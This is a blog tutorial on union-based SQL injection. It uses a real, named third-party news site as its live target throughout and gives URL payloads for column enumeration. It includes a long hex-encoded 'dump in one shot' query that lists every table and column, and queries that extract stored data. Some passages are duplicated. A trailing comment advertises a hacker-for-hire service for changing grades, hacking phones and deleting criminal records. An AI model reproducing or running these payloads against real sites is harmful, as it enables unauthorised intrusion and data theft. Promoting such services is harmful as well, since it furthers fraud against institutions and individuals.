SQL INJECTION
IN THE NAME OF ALLAH THE MOST BENEFICENT AND MERCIFUL.
Today i am going to post a Tut. on Simple Sql Injection, Before I posted the Sql Injection error based but some of my friends ask me to make a tut. on simple and basic Sql injection.
So lets start.
So lets start.
1st take a Sql Vulnerable site.
I pick that one.
http://raahauges.com/view-news.php?id=8
Now put a ' at the end.
Like that.
http://raahauges.com/view-news.php?id=8'
You will see that There is an error. {{
You have an error
in your SQL syntax; check the manual that corresponds to your MariaDB
server version for the right syntax to use near ''' at line 1}}
There we see the sql error but sometimes it doesn't shows and instead of that something missed printing so we can say that it is vuln. to sql injection. Many of sites show the sql injection error.
Now you have to find the columns because the website data was stored in the columns, to find the columns use ORDER BY
Like that:.
Now you have to find the columns because the website data was stored in the columns, to find the columns use ORDER BY
Like that:.
http://raahauges.com/view-news.php?id=8 order by 1 --+
(--+ is used to close your query )
By the up query you got the main page before putting '. Now keep incrementing the number like that.
http://raahauges.com/view-news.php?id=8 order by 1 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 2 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 3--+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 4 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 5 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 6--+ (Unknown column '6' in 'order clause')
(--+ is used to close your query )
By the up query you got the main page before putting '. Now keep incrementing the number like that.
http://raahauges.com/view-news.php?id=8 order by 1 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 2 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 3--+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 4 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 5 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 6--+ (Unknown column '6' in 'order clause')
So we can came to know that the web have 5 columns.
Now we can get the Vulnerable column, To find use UNION ALL SELECT statement.
like that :.
http://raahauges.com/view-news.php?id=-8+UNION+ALL+SELECT+1,2,3,4,5--+
put a - after id= and before 8 to get printed the vuln. column.
Now we have to fetch the data from that column.
There are many Different commands to get data before getting the tables i will define some
@@version => to find version of the web (just put @@version) in the vuln col.
http://raahauges.com/view-news.php?id=-8+UNION+ALL+SELECT+1,2,@@version,4,5--+
USER()
DATABASE()
IF((@@LOWER_CASE_TABLE_NAMES)=0,0x594553,0x4e4f)
IF((@@LOWER_CASE_FILE_SYSTEM)=0,0x594553,0x4e4f)
@@HOSTNAME
@@PORT
@@MYISAM_RECOVER_OPTIONS
@@VERSION_COMPILE_OS
@@WAIT_TIMEOUT
Just put any of them in the vuln col. and get your Desired result.
Now we have to find the tables from the vuln col.
For that purpose Leets named as trojan made a DIOS ( Dump In One Shot Query) which will print all the columns and tables.
DIOS =
concat(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,concat(concat(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203a3a203c2f666f6e743e3c2f63656e7465723e3c2f623e),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),concat(0x3c62723e3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c62723e546f74616c205461626c657320496e20416c6c20446174616261736573203a3a20,(select count(*) from information_Schema.tables),0x3c62723e5461626c657320436f756e7420496e205072696d617279204461746162617365203a3a20,(Select count(*) from information_Schema.tables where table_schema=database()),(select(@x)from(select(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(select(0) from(information_schema.columns)where(table_schema=database()) and(0x00)in(@x:=Concat(@x, 0x3c62723e, if( (@tbl!=table_name), Concat(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,LPAD(@r:=@r%2B1, 2, 0x30),0x2e,@tbl:=table_name,0x3c666f6e7420636f6c6f723d626c61636b3e203a3a20436f6c756d6e7320496e2054686973205461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@tbl),0x20284461746162617365203a3a20,database(),0x29,0x3c2f666f6e743e,0x3c62723e), 0x00),0x203a3a20,0x3c666f6e7420636f6c6f723d677265656e2073697a653d323e,0x7e20,column_name,0x3c2f666f6e743e ))))x))))
like that :.
http://raahauges.com/view-news.php?id=-8+UNION+ALL+SELECT+1,2,concat(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,concat(concat(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203a3a203c2f666f6e743e3c2f63656e7465723e3c2f623e),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),concat(0x3c62723e3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c62723e546f74616c205461626c657320496e20416c6c20446174616261736573203a3a20,(select count(*) from information_Schema.tables),0x3c62723e5461626c657320436f756e7420496e205072696d617279204461746162617365203a3a20,(Select count(*) from information_Schema.tables where table_schema=database()),(select(@x)from(select(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(select(0) from(information_schema.columns)where(table_schema=database()) and(0x00)in(@x:=Concat(@x, 0x3c62723e, if( (@tbl!=table_name), Concat(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,LPAD(@r:=@r%2B1, 2, 0x30),0x2e,@tbl:=table_name,0x3c666f6e7420636f6c6f723d626c61636b3e203a3a20436f6c756d6e7320496e2054686973205461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@tbl),0x20284461746162617365203a3a20,database(),0x29,0x3c2f666f6e743e,0x3c62723e), 0x00),0x203a3a20,0x3c666f6e7420636f6c6f723d677265656e2073697a653d323e,0x7e20,column_name,0x3c2f666f6e743e ))))x)))),4,5--+
Now to get that information just put that table name in the vuln col. and at the end the column name like that.
Suppose i need information about id and date from the col. NEWS.
the query would be like that.
http://raahauges.com/view-news.php?id=-8+UNION+ALL+SELECT+1,2,concat(id,0x3a3a3a3a3a,date),4,5 from news --+
Concat function is used to join two things.
&
0x3a is used to print :
So you got your desired result.
hope you got all that. :D
if you have any problem just comment :)
Thanks.
Video tutorial. :)
If you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest
ReplyDeleteEmail: cybergoldenhacker at gmail dot com